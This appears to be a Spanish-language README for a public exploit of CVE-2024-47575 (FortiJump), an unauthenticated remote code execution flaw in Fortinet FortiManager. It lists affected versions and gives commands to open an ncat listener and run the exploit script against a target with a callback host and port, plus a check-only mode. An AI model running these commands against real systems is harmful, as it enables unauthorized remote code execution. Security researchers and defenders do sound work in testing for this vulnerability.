Fortijump Exploit CVE 2024 47575
1.0.0
Fortinet FortiManager Ejecución remota de código no autenticado, también conocido como FortiJump CVE-2024-47575
Consulte nuestra publicación de blog para obtener detalles técnicos.
Para comenzar, establezca su sesión ncat:
nc -lvvnp 80
Luego, ejecute nuestro generador de artefactos de detección:
python3 CVE-2024-47575.py --target 192.168.1.110 --lhost 192.168.1.53 --lport 80 --action exploit
Para verificar la vulnerabilidad solo, use las siguientes opciones:
python3 CVE-2024-47575.py --target 192.168.1.110 --action check
FortiManager 7.6.0
FortiManager 7.4.0 through 7.4.4
FortiManager 7.2.0 through 7.2.7
FortiManager 7.0.0 through 7.0.12
FortiManager 6.4.0 through 6.4.14
FortiManager 6.2.0 through 6.2.12
FortiManager Cloud 7.4.1 through 7.4.4
FortiManager Cloud 7.2.1 through 7.2.7
FortiManager Cloud 7.0.1 through 7.0.12
FortiManager Cloud 6.4
Este exploit fue escrito por Sina Kheirkhah (@SinSinology) de watchTowr (@watchtowrcyber)
Para conocer las últimas investigaciones de seguridad, siga al equipo de watchTowr Labs